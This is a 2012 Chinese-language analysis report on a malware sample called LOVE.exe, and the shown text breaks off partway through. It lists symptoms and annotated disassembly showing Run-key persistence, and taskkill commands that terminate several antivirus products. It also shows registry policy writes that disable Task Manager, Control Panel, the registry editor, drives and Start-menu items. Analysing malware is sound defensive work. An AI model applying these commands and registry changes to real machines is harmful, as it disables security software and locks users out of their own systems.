LOVE.exe分析
基本信息
报告名称:对一恶意程序的分析
作者:Thend 报告更新日期:2012.08.03 样本发现日期:未知 样本类型:恶性病毒 样本文件MD5 校验值: c0d9cec618648730f44f2d5a3bd403db 壳信息:无壳 语言:VC++6.0
可能受到威胁的系统:Windows 相关漏洞:无 简介
加入注册表达到自启动,病毒文件同过自己释放一个图标,将图标设为所有应用程序默认图标,并禁用和隐藏了计算机大部分功能。使得计算机根本无法正常工作。
被感染系统及网络症状 隐藏:所有的文件和文件夹,开始菜单中的”运行“、“关机”、“注销”、“搜索”、“登陆”,磁盘驱动器,驱动器,文件夹选项,IE主页选项组,IE文件菜单,IE收藏夹栏,internet选项。
禁用:控制面板,任务管理器,驱动器,打印,IE查看源文件,IE下载功能,右键关联,重启切换到DOS环境,文档菜单,鼠标右键。 关闭所有杀软。所有应用程序图标更改。打开TXT和INF文件方式默认为:查看图片。 文件系统变化 C:\windows\system32\这个目录下生成一个名为Aver.ico的图片,在和主程序同目录下生成del.bat和ddel.bat两个文件,到最后,全部删除。
注册表变化 这部分变化直接在代码分析中了,很多很多,就不一一列出了。主要就有个:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe SUCCESS "C:\Documents and
Settings\Administrator\桌面\LOVE.exe" |
对恶意程序本体的分析:
004010CB /. 55 push ebp ; 在段首下断点 004010CC |. 8BEC mov ebp,esp 004010CE |. 81EC 14000000 sub esp,0x14 004010D4 |. 68 01030080 push 0x80000301 004010D9 |. 6A 00 push 0x0 004010DB |. 68 E8030000 push 0x3E8 004010E0 |. 68 01000000 push 0x1 004010E5 |. BB 703E4000 mov ebx,LOVE.00403E70 004010EA |. E8 64220000 call LOVE.00403353 004010EF |. 83C4 10 add esp,0x10 004010F2 |. 68 00000000 push 0x0 004010F7 |. BB 10354000 mov ebx,LOVE.00403510 ; j 004010FC |. E8 52220000 call LOVE.00403353 00401101 |. 83C4 04 add esp,0x4 00401104 |. 8945 FC mov [local.1],eax 00401107 |. 68 00000000 push 0x0 0040110C |. BB 30354000 mov ebx,LOVE.00403530 ; j 00401111 |. E8 3D220000 call LOVE.00403353 ; 载入病毒名字 LOVE.exe 00401116 |. 83C4 04 add esp,0x4 00401119 |. 8945 F8 mov [local.2],eax 0040111C |. FF75 F8 push [local.2] 0040111F |. 68 D8994600 push LOVE.004699D8 ; \ 00401124 |. FF75 FC push [local.1] 00401127 |. B9 03000000 mov ecx,0x3 0040112C |. E8 3EFFFFFF call LOVE.0040106F 00401157 |> \6A 00 push 0x0 00401159 |. 6A 00 push 0x0 0040115B |. 6A 00 push 0x0 0040115D |. 68 04000080 push 0x80000004 00401162 |. 6A 00 push 0x0 00401164 |. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico 00401169 |. 68 01030080 push 0x80000301 0040116E |. 6A 00 push 0x0 00401170 |. 68 00000000 push 0x0 00401175 |. 68 04000080 push 0x80000004 0040117A |. 6A 00 push 0x0 0040117C |. 8B45 F4 mov eax,[local.3] 0040117F |. 85C0 test eax,eax 00401181 |. 75 05 jnz XLOVE.00401188 00401183 |. B8 F7994600 mov eax,LOVE.004699F7 00401188 |> 50 push eax 00401189 |. 68 04000000 push 0x4 0040118E |. B8 01000000 mov eax,0x1 00401193 |. BB 10754400 mov ebx,LOVE.00447510 00401198 |. E8 C8210000 call LOVE.00403365 ; 在C:\windows\system32\这个目录下生成一个名为Aver.ico的图片 0040119D |. 83C4 34 add esp,0x34 004011A7 |. 53 push ebx 004011A8 |. E8 B2210000 call LOVE.0040335F 004011AD |. 83C4 04 add esp,0x4 004011B0 |> 68 04000080 push 0x80000004 004011B5 |. 6A 00 push 0x0 004011B7 |. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico 004011BC |. 68 04000080 push 0x80000004 004011C1 |. 6A 00 push 0x0 004011C3 |. 68 F8994600 push LOVE.004699F8 ; SOFTWARE\Classes\exefile\DefaultIcon\ 004011C8 |. 68 01030080 push 0x80000301 004011CD |. 6A 00 push 0x0 004011CF |. 68 04000000 push 0x4 004011D4 |. 68 03000000 push 0x3 004011D9 |. BB 103B4000 mov ebx,LOVE.00403B10 004011DE |. E8 70210000 call LOVE.00403353 ; 指定应用程序的默认图标是刚刚生成的那个Aver.ico 004011F0 |. E8 5E210000 call LOVE.00403353 ; 再次载入LOVE.exe 004011F5 |. 83C4 04 add esp,0x4 004011F8 |. 8945 FC mov [local.1],eax 004011FB |. FF75 FC push [local.1] 004011FE |. 68 1E9A4600 push LOVE.00469A1E ; Software\Microsoft\Windows\CurrentVersion\Run\ 00401203 |. B9 02000000 mov ecx,0x2 00401208 |. E8 62FEFFFF call LOVE.0040106F ; 将LOVE.exe加入开机自启动项 004012FD |. 83C4 04 add esp,0x4 00401300 |. 8945 FC mov [local.1],eax 00401303 |. 68 4D9A4600 push LOVE.00469A4D ; \del.bat 00401308 |. FF75 FC push [local.1] 0040130B |. B9 02000000 mov ecx,0x2 00401310 |. E8 5AFDFFFF call LOVE.0040106F ; 等会儿就会在桌面上生成个del.bat 00401315 |. 83C4 08 add esp,0x8 00401318 |. 8945 F8 mov [local.2],eax 0040131B |. 8B5D FC mov ebx,[local.1] 0040131E |. 85DB test ebx,ebx 00401320 |. 74 09 je XLOVE.0040132B 00401322 |. 53 push ebx 00401323 |. E8 37200000 call LOVE.0040335F 00401382 |. 68 799A4600 push LOVE.00469A79 ; \ddel.bat 00401387 |. FF75 FC push [local.1] 0040138A |. B9 02000000 mov ecx,0x2 0040138F |. E8 DBFCFFFF call LOVE.0040106F 00401394 |. 83C4 08 add esp,0x8 00401397 |. 8945 F8 mov [local.2],eax 0040139A |. 8B5D FC mov ebx,[local.1] 0040139D |. 85DB test ebx,ebx 0040139F |. 74 09 je XLOVE.004013AA 004013A1 |. 53 push ebx 004013A2 |. E8 B81F0000 call LOVE.0040335F 004013A7 |. 83C4 04 add esp,0x4 004013AA |> 68 05000080 push 0x80000005 004013AF |. 6A 00 push 0x0 004013B1 |. 68 839A4600 push LOVE.00469A83 004013B6 |. 68 04000080 push 0x80000004 004013BB |. 6A 00 push 0x0 004013BD |. 8B45 F8 mov eax,[local.2] 004013C0 |. 85C0 test eax,eax 004013C2 |. 75 05 jnz XLOVE.004013C9 004013C4 |. B8 F7994600 mov eax,LOVE.004699F7 004013C9 |> 50 push eax 004013CA |. 68 02000000 push 0x2 004013CF |. BB 30374000 mov ebx,LOVE.00403730 004013D4 |. E8 7A1F0000 call LOVE.00403353 ;在桌面上生成个ddel.bat 004013D9 |. 83C4 1C add esp,0x1C 004013E4 |. E8 761F0000 call LOVE.0040335F 004013E9 |. 83C4 04 add esp,0x4 004013EC |> 68 00000000 push 0x0 004013F1 |. B8 01000000 mov eax,0x1 004013F6 |. BB 20764400 mov ebx,LOVE.00447620 004013FB |. E8 651F0000 call LOVE.00403365 ; 任务栏了没有了。。。 00401400 |. 83C4 04 add esp,0x4 00401403 |. 68 00000000 push 0x0 00401408 |. B8 01000000 mov eax,0x1 0040140D |. BB C0754400 mov ebx,LOVE.004475C0 00401412 |. E8 4E1F0000 call LOVE.00403365 00401440 |. 83C4 04 add esp,0x4 00401443 |. 8945 FC mov [local.1],eax 00401446 |. 68 799A4600 push LOVE.00469A79 ; \ddel.bat 0040144B |. FF75 FC push [local.1] 0040144E |. B9 02000000 mov ecx,0x2 00401453 |. E8 17FCFFFF call LOVE.0040106F 00401458 |. 83C4 08 add esp,0x8 0040145B |. 8945 F8 mov [local.2],eax 0040145E |. 8B5D FC mov ebx,[local.1] 00401461 |. 85DB test ebx,ebx 00401463 |. 74 09 je XLOVE.0040146E 00401465 |. 53 push ebx 00401466 |. E8 F41E0000 call LOVE.0040335F 0040146B |. 83C4 04 add esp,0x4 0040146E |> 68 01030080 push 0x80000301 00401473 |. 6A 00 push 0x0 00401475 |. 68 01000000 push 0x1 0040147A |. 68 02000080 push 0x80000002 0040147F |. 6A 00 push 0x0 00401481 |. 68 00000000 push 0x0 00401486 |. 68 04000080 push 0x80000004 0040148B |. 6A 00 push 0x0 0040148D |. 8B45 F8 mov eax,[local.2] 00401490 |. 85C0 test eax,eax 00401492 |. 75 05 jnz XLOVE.00401499 00401494 |. B8 F7994600 mov eax,LOVE.004699F7 00401499 |> 50 push eax 0040149A |. 68 03000000 push 0x3 0040149F |. BB 80334000 mov ebx,LOVE.00403380 004014A4 |. E8 AA1E0000 call LOVE.00403353 ; 执行ddel.bat 004014D2 |. E8 7C1E0000 call LOVE.00403353 004014D7 |. 83C4 10 add esp,0x10 004014DA |. 68 01030080 push 0x80000301 004014DF |. 6A 00 push 0x0 004014E1 |. 68 01000000 push 0x1 004014E6 |. 68 02000080 push 0x80000002 004014EB |. 6A 00 push 0x0 004014ED |. 68 00000000 push 0x0 004014F2 |. 68 04000080 push 0x80000004 004014F7 |. 6A 00 push 0x0 004014F9 |. 68 DA9A4600 push LOVE.00469ADA ; cmd /c taskkill /f /im Aver.exe 004014FE |. 68 03000000 push 0x3 00401503 |. BB 80334000 mov ebx,LOVE.00403380 00401508 |. E8 461E0000 call LOVE.00403353 ; 删除那个Aver.ico图标 00401525 |. 68 4D9A4600 push LOVE.00469A4D ; \del.bat 0040152A |. FF75 FC push [local.1] 0040152D |. B9 02000000 mov ecx,0x2 00401532 |. E8 38FBFFFF call LOVE.0040106F 00401537 |. 83C4 08 add esp,0x8 0040153A |. 8945 F8 mov [local.2],eax 0040153D |. 8B5D FC mov ebx,[local.1] 00401540 |. 85DB test ebx,ebx 00401542 |. 74 09 je XLOVE.0040154D 00401544 |. 53 push ebx 00401545 |. E8 151E0000 call LOVE.0040335F 0040154A |. 83C4 04 add esp,0x4 0040154D |> 68 01030080 push 0x80000301 00401552 |. 6A 00 push 0x0 00401554 |. 68 01000000 push 0x1 00401559 |. 68 02000080 push 0x80000002 0040155E |. 6A 00 push 0x0 00401560 |. 68 00000000 push 0x0 00401565 |. 68 04000080 push 0x80000004 0040156A |. 6A 00 push 0x0 0040156C |. 8B45 F8 mov eax,[local.2] 0040156F |. 85C0 test eax,eax 00401571 |. 75 05 jnz XLOVE.00401578 00401573 |. B8 F7994600 mov eax,LOVE.004699F7 00401578 |> 50 push eax 00401579 |. 68 03000000 push 0x3 0040157E |. BB 80334000 mov ebx,LOVE.00403380 00401583 |. E8 CB1D0000 call LOVE.00403353 ; 执行del.bat 并删除 00401593 |. E8 C71D0000 call LOVE.0040335F 00401598 |. 83C4 04 add esp,0x4 0040159B |> 68 04000080 push 0x80000004 004015A0 |. 6A 00 push 0x0 004015A2 |. 68 FA9A4600 push LOVE.00469AFA ; 2056年1月1日 004015A7 |. 68 01000000 push 0x1 004015AC |. BB B0354000 mov ebx,LOVE.004035B0 004015B1 |. E8 9D1D0000 call LOVE.00403353 004015B6 |. 83C4 10 add esp,0x10 004015B9 |. 68 03000080 push 0x80000003 004015BE |. 52 push edx 004015BF |. 50 push eax 004015C0 |. 68 01000000 push 0x1 004015C5 |. BB C0364000 mov ebx,LOVE.004036C0 004015CA |. E8 841D0000 call LOVE.00403353 ; 把你系统的时间设置成2056年1月1日 004015D2 |. 68 01030080 push 0x80000301 004015D7 |. 6A 00 push 0x0 004015D9 |. 68 01000000 push 0x1 004015DE |. 68 02000080 push 0x80000002 004015E3 |. 6A 00 push 0x0 004015E5 |. 68 00000000 push 0x0 004015EA |. 68 04000080 push 0x80000004 004015EF |. 6A 00 push 0x0 004015F1 |. 68 079B4600 push LOVE.00469B07 ; taskkill /f /im kavsvc.exe 004015F6 |. 68 03000000 push 0x3 004015FB |. BB 80334000 mov ebx,LOVE.00403380 00401600 |. E8 4E1D0000 call LOVE.00403353 ; 找到并强制终止卡巴 00401608 |. 68 01030080 push 0x80000301 0040160D |. 6A 00 push 0x0 0040160F |. 68 01000000 push 0x1 00401614 |. 68 02000080 push 0x80000002 00401619 |. 6A 00 push 0x0 0040161B |. 68 00000000 push 0x0 00401620 |. 68 04000080 push 0x80000004 00401625 |. 6A 00 push 0x0 00401627 |. 68 229B4600 push LOVE.00469B22 ; taskkill /f /im KVXP.kxp 0040162C |. 68 03000000 push 0x3 00401631 |. BB 80334000 mov ebx,LOVE.00403380 00401636 |. E8 181D0000 call LOVE.00403353 ; 找到并强制终止江民杀软进程 0040163E |. 68 01030080 push 0x80000301 00401643 |. 6A 00 push 0x0 00401645 |. 68 01000000 push 0x1 0040164A |. 68 02000080 push 0x80000002 0040164F |. 6A 00 push 0x0 00401651 |. 68 00000000 push 0x0 00401656 |. 68 04000080 push 0x80000004 0040165B |. 6A 00 push 0x0 0040165D |. 68 3B9B4600 push LOVE.00469B3B ; taskkill /f /im Rav.exe 00401662 |. 68 03000000 push 0x3 00401667 |. BB 80334000 mov ebx,LOVE.00403380 0040166C |. E8 E21C0000 call LOVE.00403353 ; 关闭瑞星 00401674 |. 68 01030080 push 0x80000301 00401679 |. 6A 00 push 0x0 0040167B |. 68 01000000 push 0x1 00401680 |. 68 02000080 push 0x80000002 00401685 |. 6A 00 push 0x0 00401687 |. 68 00000000 push 0x0 0040168C |. 68 04000080 push 0x80000004 00401691 |. 6A 00 push 0x0 00401693 |. 68 539B4600 push LOVE.00469B53 ; taskkill /f /im Ravmon.exe 00401698 |. 68 03000000 push 0x3 0040169D |. BB 80334000 mov ebx,LOVE.00403380 004016A2 |. E8 AC1C0000 call LOVE.00403353 ; 关闭瑞星的这个监视程序 004016AA |. 68 01030080 push 0x80000301 004016AF |. 6A 00 push 0x0 004016B1 |. 68 01000000 push 0x1 004016B6 |. 68 02000080 push 0x80000002 004016BB |. 6A 00 push 0x0 004016BD |. 68 00000000 push 0x0 004016C2 |. 68 04000080 push 0x80000004 004016C7 |. 6A 00 push 0x0 004016C9 |. 68 6E9B4600 push LOVE.00469B6E ; taskkill /f /im Mcshield.exe 004016CE |. 68 03000000 push 0x3 004016D3 |. BB 80334000 mov ebx,LOVE.00403380 004016D8 |. E8 761C0000 call LOVE.00403353 ; 关闭McAfee VirusScan核心进程 004016E0 |. 68 01030080 push 0x80000301 004016E5 |. 6A 00 push 0x0 004016E7 |. 68 01000000 push 0x1 004016EC |. 68 02000080 push 0x80000002 004016F1 |. 6A 00 push 0x0 004016F3 |. 68 00000000 push 0x0 004016F8 |. 68 04000080 push 0x80000004 004016FD |. 6A 00 push 0x0 004016FF |. 68 8B9B4600 push LOVE.00469B8B ; taskkill /f /im VsTskMgr.exe 00401704 |. 68 03000000 push 0x3 00401709 |. BB 80334000 mov ebx,LOVE.00403380 0040170E |. E8 401C0000 call LOVE.00403353 ; 关闭McAfee VirusScan的一个组件 00401716 |. 68 01030080 push 0x80000301 0040171B |. 6A 00 push 0x0 0040171D |. 68 00000000 push 0x0 00401722 |. 68 04000080 push 0x80000004 00401727 |. 6A 00 push 0x0 00401729 |. 68 A89B4600 push LOVE.00469BA8 ; SOFTWARE\360Safe\safemon\ExecAccess 0040172E |. 68 01030080 push 0x80000301 00401733 |. 6A 00 push 0x0 00401735 |. 68 04000000 push 0x4 0040173A |. 68 03000000 push 0x3 0040173F |. BB 103B4000 mov ebx,LOVE.00403B10 00401744 |. E8 0A1C0000 call LOVE.00403353 00401749 |. 83C4 28 add esp,0x28 0040174C |. 68 01030080 push 0x80000301 00401751 |. 6A 00 push 0x0 00401753 |. 68 00000000 push 0x0 00401758 |. 68 04000080 push 0x80000004 0040175D |. 6A 00 push 0x0 0040175F |. 68 CC9B4600 push LOVE.00469BCC ; SOFTWARE\360Safe\safemon\MonAccess 00401764 |. 68 01030080 push 0x80000301 00401769 |. 6A 00 push 0x0 0040176B |. 68 04000000 push 0x4 00401770 |. 68 03000000 push 0x3 00401775 |. BB 103B4000 mov ebx,LOVE.00403B10 0040177A |. E8 D41B0000 call LOVE.00403353 0040177F |. 83C4 28 add esp,0x28 00401782 |. 68 01030080 push 0x80000301 00401787 |. 6A 00 push 0x0 00401789 |. 68 00000000 push 0x0 0040178E |. 68 04000080 push 0x80000004 00401793 |. 6A 00 push 0x0 00401795 |. 68 EF9B4600 push LOVE.00469BEF ; SOFTWARE\360Safe\safemon\SiteAccess 0040179A |. 68 01030080 push 0x80000301 0040179F |. 6A 00 push 0x0 004017A1 |. 68 04000000 push 0x4 004017A6 |. 68 03000000 push 0x3 004017AB |. BB 103B4000 mov ebx,LOVE.00403B10 004017B0 |. E8 9E1B0000 call LOVE.00403353 004017B5 |. 83C4 28 add esp,0x28 004017B8 |. 68 01030080 push 0x80000301 004017BD |. 6A 00 push 0x0 004017BF |. 68 00000000 push 0x0 004017C4 |. 68 04000080 push 0x80000004 004017C9 |. 6A 00 push 0x0 004017CB |. 68 139C4600 push LOVE.00469C13 ; SOFTWARE\360Safe\safemon\UDiskAccess 004017D0 |. 68 01030080 push 0x80000301 004017D5 |. 6A 00 push 0x0 004017D7 |. 68 04000000 push 0x4 004017DC |. 68 03000000 push 0x3 004017E1 |. BB 103B4000 mov ebx,LOVE.00403B10 004017E6 |. E8 681B0000 call LOVE.00403353 004017EB |. 83C4 28 add esp,0x28 004017EE |. 68 01030080 push 0x80000301 004017F3 |. 6A 00 push 0x0 004017F5 |. 68 01000000 push 0x1 004017FA |. 68 02000080 push 0x80000002 004017FF |. 6A 00 push 0x0 00401801 |. 68 00000000 push 0x0 00401806 |. 68 04000080 push 0x80000004 0040180B |. 6A 00 push 0x0 0040180D |. 68 389C4600 push LOVE.00469C38 ; taskkill /f /im 360tray.exe 00401812 |. 68 03000000 push 0x3 00401817 |. BB 80334000 mov ebx,LOVE.00403380 0040181C |. E8 321B0000 call LOVE.00403353 ;反正就是把360所有的关闭掉 00401824 |. 68 04000080 push 0x80000004 00401829 |. 6A 00 push 0x0 0040182B |. 68 549C4600 push LOVE.00469C54 ; jpegfile 00401830 |. 68 04000080 push 0x80000004 00401835 |. 6A 00 push 0x0 00401837 |. 68 5D9C4600 push LOVE.00469C5D ; .txt\ 0040183C |. 68 01030080 push 0x80000301 00401841 |. 6A 00 push 0x0 00401843 |. 68 01000000 push 0x1 00401848 |. 68 03000000 push 0x3 0040184D |. BB 103B4000 mov ebx,LOVE.00403B10 00401852 |. E8 FC1A0000 call LOVE.00403353 00401857 |. 83C4 28 add esp,0x28 0040185A |. 68 04000080 push 0x80000004 0040185F |. 6A 00 push 0x0 00401861 |. 68 549C4600 push LOVE.00469C54 ; jpegfile 00401866 |. 68 04000080 push 0x80000004 0040186B |. 6A 00 push 0x0 0040186D |. 68 639C4600 push LOVE.00469C63 ; .inf\ 00401872 |. 68 01030080 push 0x80000301 00401877 |. 6A 00 push 0x0 00401879 |. 68 01000000 push 0x1 0040187E |. 68 03000000 push 0x3 00401883 |. BB 103B4000 mov ebx,LOVE.00403B10 00401888 |. E8 C61A0000 call LOVE.00403353 ; 设置:所有的TXT文件和inf文件打开方式都默认为图片查看 00401890 |. 68 01030080 push 0x80000301 00401895 |. 6A 00 push 0x0 00401897 |. 68 00000000 push 0x0 0040189C |. 68 04000080 push 0x80000004 004018A1 |. 6A 00 push 0x0 004018A3 |. 68 699C4600 push LOVE.00469C69 ; SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue 004018A8 |. 68 01030080 push 0x80000301 004018AD |. 6A 00 push 0x0 004018AF |. 68 04000000 push 0x4 004018B4 |. 68 03000000 push 0x3 004018B9 |. BB 103B4000 mov ebx,LOVE.00403B10 004018BE |. E8 901A0000 call LOVE.00403353 ; 隐藏文件和文件夹 004018C6 |. 68 01030080 push 0x80000301 004018CB |. 6A 00 push 0x0 004018CD |. 68 00000000 push 0x0 004018D2 |. 68 04000080 push 0x80000004 004018D7 |. 6A 00 push 0x0 004018D9 |. 68 C89C4600 push LOVE.00469CC8 ; Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr 004018DE |. 68 01030080 push 0x80000301 004018E3 |. 6A 00 push 0x0 004018E5 |. 68 03000000 push 0x3 004018EA |. 68 03000000 push 0x3 004018EF |. BB 103B4000 mov ebx,LOVE.00403B10 004018F4 |. E8 5A1A0000 call LOVE.00403353 ; 禁用任务管理器 004018FC |. 68 01030080 push 0x80000301 00401901 |. 6A 00 push 0x0 00401903 |. 68 01000000 push 0x1 00401908 |. 68 04000080 push 0x80000004 0040190D |. 6A 00 push 0x0 0040190F |. 68 119D4600 push LOVE.00469D11 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel 00401914 |. 68 01030080 push 0x80000301 00401919 |. 6A 00 push 0x0 0040191B |. 68 03000000 push 0x3 00401920 |. 68 03000000 push 0x3 00401925 |. BB 103B4000 mov ebx,LOVE.00403B10 0040192A |. E8 241A0000 call LOVE.00403353 ; 禁用控制面板 00401932 |. 68 01030080 push 0x80000301 00401937 |. 6A 00 push 0x0 00401939 |. 68 01000000 push 0x1 0040193E |. 68 04000080 push 0x80000004 00401943 |. 6A 00 push 0x0 00401945 |. 68 5C9D4600 push LOVE.00469D5C ; Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools 0040194A |. 68 01030080 push 0x80000301 0040194F |. 6A 00 push 0x0 00401951 |. 68 03000000 push 0x3 00401956 |. 68 03000000 push 0x3 0040195B |. BB 103B4000 mov ebx,LOVE.00403B10 00401960 |. E8 EE190000 call LOVE.00403353 ; 禁用注册表 00401968 |. 68 01030080 push 0x80000301 0040196D |. 6A 00 push 0x0 0040196F |. 68 01000000 push 0x1 00401974 |. 68 04000080 push 0x80000004 00401979 |. 6A 00 push 0x0 0040197B |. 68 AB9D4600 push LOVE.00469DAB ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun 00401980 |. 68 01030080 push 0x80000301 00401985 |. 6A 00 push 0x0 00401987 |. 68 03000000 push 0x3 0040198C |. 68 03000000 push 0x3 00401991 |. BB 103B4000 mov ebx,LOVE.00403B10 00401996 |. E8 B8190000 call LOVE.00403353 ; 隐藏开始菜单中的运行。 0040199E |. 68 01030080 push 0x80000301 004019A3 |. 6A 00 push 0x0 004019A5 |. 68 01000000 push 0x1 004019AA |. 68 04000080 push 0x80000004 004019AF |. 6A 00 push 0x0 004019B1 |. 68 ED9D4600 push LOVE.00469DED ; SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled 004019B6 |. 68 01030080 push 0x80000301 004019BB |. 6A 00 push 0x0 004019BD |. 68 03000000 push 0x3 004019C2 |. 68 03000000 push 0x3 004019C7 |. BB 103B4000 mov ebx,LOVE.00403B10 004019CC |. E8 82190000 call LOVE.00403353 ; 禁用所有的磁盘驱动器,无论在哪儿都看不到磁盘 004019D4 |. 68 01060080 push 0x80000601 004019D9 |. 68 FFFFEF41 push 0x41EFFFFF 004019DE |. 68 0000E0FF push 0xFFE00000 004019E3 |. 68 04000080 push 0x80000004 004019E8 |. 6A 00 push 0x0 004019EA |. 68 379E4600 push LOVE.00469E37 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives 004019EF |. 68 01030080 push 0x80000301 004019F4 |. 6A 00 push 0x0 004019F6 |. 68 03000000 push 0x3 004019FB |. 68 03000000 push 0x3 00401A00 |. BB 103B4000 mov ebx,LOVE.00403B10 00401A05 |. E8 49190000 call LOVE.00403353 ; 隐藏所有驱动器 00401A0D |. 68 01060080 push 0x80000601 00401A12 |. 68 FFFFEF41 push 0x41EFFFFF 00401A17 |. 68 0000E0FF push 0xFFE00000 00401A1C |. 68 04000080 push 0x80000004 00401A21 |. 6A 00 push 0x0 00401A23 |. 68 7C9E4600 push LOVE.00469E7C ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive 00401A28 |. 68 01030080 push 0x80000301 00401A2D |. 6A 00 push 0x0 00401A2F |. 68 03000000 push 0x3 00401A34 |. 68 03000000 push 0x3 00401A39 |. BB 103B4000 mov ebx,LOVE.00403B10 00401A3E |. E8 10190000 call LOVE.00403353 ; 禁用所有驱动器 00401A46 |. 68 01030080 push 0x80000301 00401A4B |. 6A 00 push 0x0 00401A4D |. 68 01000000 push 0x1 00401A52 |. 68 04000080 push 0x80000004 00401A57 |. 6A 00 push 0x0 00401A59 |. 68 C69E4600 push LOVE.00469EC6 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions 00401A5E |. 68 01030080 push 0x80000301 00401A63 |. 6A 00 push 0x0 00401A65 |. 68 03000000 push 0x3 00401A6A |. 68 03000000 push 0x3 00401A6F |. BB 103B4000 mov ebx,LOVE.00403B10 00401A74 |. E8 DA180000 call LOVE.00403353 ; 禁用文件夹选项 00401A7C |. 68 01030080 push 0x80000301 00401A81 |. 6A 00 push 0x0 00401A83 |. 68 01000000 push 0x1 00401A88 |. 68 04000080 push 0x80000004 00401A8D |. 6A 00 push 0x0 00401A8F |. 68 129F4600 push LOVE.00469F12 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose 00401A94 |. 68 01030080 push 0x80000301 00401A99 |. 6A 00 push 0x0 00401A9B |. 68 03000000 push 0x3 00401AA0 |. 68 03000000 push 0x3 00401AA5 |. BB 103B4000 mov ebx,LOVE.00403B10 00401AAA |. E8 A4180000 call LOVE.00403353 ; 隐藏开始菜单中的关机 00401AB2 |. 68 01030080 push 0x80000301 00401AB7 |. 6A 00 push 0x0 00401AB9 |. 68 01000000 push 0x1 00401ABE |. 68 04000080 push 0x80000004 00401AC3 |. 6A 00 push 0x0 00401AC5 |. 68 569F4600 push LOVE.00469F56 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind 00401ACA |. 68 01030080 push 0x80000301 00401ACF |. 6A 00 push 0x0 00401AD1 |. 68 03000000 push 0x3 00401AD6 |. 68 03000000 push 0x3 00401ADB |. BB 103B4000 mov ebx,LOVE.00403B10 00401AE0 |. E8 6E180000 call LOVE.00403353 ; 隐藏开始菜单中的搜索 00401AE8 |. 68 01030080 push 0x80000301 00401AED |. 6A 00 push 0x0 00401AEF |. 68 01000000 push 0x1 00401AF4 |. 68 04000080 push 0x80000004 00401AF9 |. 6A 00 push 0x0 00401AFB |. 68 999F4600 push LOVE.00469F99 ; Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 00401B00 |. 68 01030080 push 0x80000301 00401B05 |. 6A 00 push 0x0 00401B07 |. 68 03000000 push 0x3 00401B0C |. 68 03000000 push 0x3 00401B11 |. BB 103B4000 mov ebx,LOVE.00403B10 00401B16 |. E8 38180000 call LOVE.00403353 ; 隐藏IE的主页选项组 00401B1E |. 68 01030080 push 0x80000301 00401B23 |. 6A 00 push 0x0 00401B25 |. 68 01000000 push 0x1 00401B2A |. 68 04000080 push 0x80000004 00401B2F |. 6A 00 push 0x0 00401B31 |. 68 DE9F4600 push LOVE.00469FDE ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu 00401B36 |. 68 01030080 push 0x80000301 00401B3B |. 6A 00 push 0x0 00401B3D |. 68 03000000 push 0x3 00401B42 |. 68 03000000 push 0x3 00401B47 |. BB 103B4000 mov ebx,LOVE.00403B10 00401B4C |. E8 02180000 call LOVE.00403353 ; 隐藏IE文件菜单 00401B54 |. 68 01030080 push 0x80000301 00401B59 |. 6A 00 push 0x0 00401B5B |. 68 01000000 push 0x1 00401B60 |. 68 04000080 push 0x80000004 00401B65 |. 6A 00 push 0x0 00401B67 |. 68 25A04600 push LOVE.0046A025 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites 00401B6C |. 68 01030080 push 0x80000301 00401B71 |. 6A 00 push 0x0 00401B73 |. 68 03000000 push 0x3 00401B78 |. 68 03000000 push 0x3 00401B7D |. BB 103B4000 mov ebx,LOVE.00403B10 00401B82 |. E8 CC170000 call LOVE.00403353 ; 隐藏收藏夹选项 00401B8A |. 68 01030080 push 0x80000301 00401B8F |. 6A 00 push 0x0 00401B91 |. 68 01000000 push 0x1 00401B96 |. 68 04000080 push 0x80000004 00401B9B |. 6A 00 push 0x0 00401B9D |. 68 6CA04600 push LOVE.0046A06C ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting 00401BA2 |. 68 01030080 push 0x80000301 00401BA7 |. 6A 00 push 0x0 00401BA9 |. 68 03000000 push 0x3 00401BAE |. 68 03000000 push 0x3 00401BB3 |. BB 103B4000 mov ebx,LOVE.00403B10 00401BB8 |. E8 96170000 call LOVE.00403353 ; 禁用IE的打印功能 00401BC0 |. 68 01030080 push 0x80000301 00401BC5 |. 6A 00 push 0x0 00401BC7 |. 68 01000000 push 0x1 00401BCC |. 68 04000080 push 0x80000004 00401BD1 |. 6A 00 push 0x0 00401BD3 |. 68 B2A04600 push LOVE.0046A0B2 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions 00401BD8 |. 68 01030080 push 0x80000301 00401BDD |. 6A 00 push 0x0 00401BDF |. 68 03000000 push 0x3 00401BE4 |. 68 03000000 push 0x3 00401BE9 |. BB 103B4000 mov ebx,LOVE.00403B10 00401BEE |. E8 60170000 call LOVE.00403353 ; 隐藏INTERTER选项 00401BF6 |. 68 01030080 push 0x80000301 00401BFB |. 6A 00 push 0x0 00401BFD |. 68 01000000 push 0x1 00401C02 |. 68 04000080 push 0x80000004 00401C07 |. 6A 00 push 0x0 00401C09 |. 68 FEA04600 push LOVE.0046A0FE ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource 00401C0E |. 68 01030080 push 0x80000301 00401C13 |. 6A 00 push 0x0 00401C15 |. 68 03000000 push 0x3 00401C1A |. 68 03000000 push 0x3 00401C1F |. BB 103B4000 mov ebx,LOVE.00403B10 00401C24 |. E8 2A170000 call LOVE.00403353 ; 禁止IE查看源文件 00401C2C |. 68 01030080 push 0x80000301 00401C31 |. 6A 00 push 0x0 00401C33 |. 68 03000000 push 0x3 00401C38 |. 68 04000080 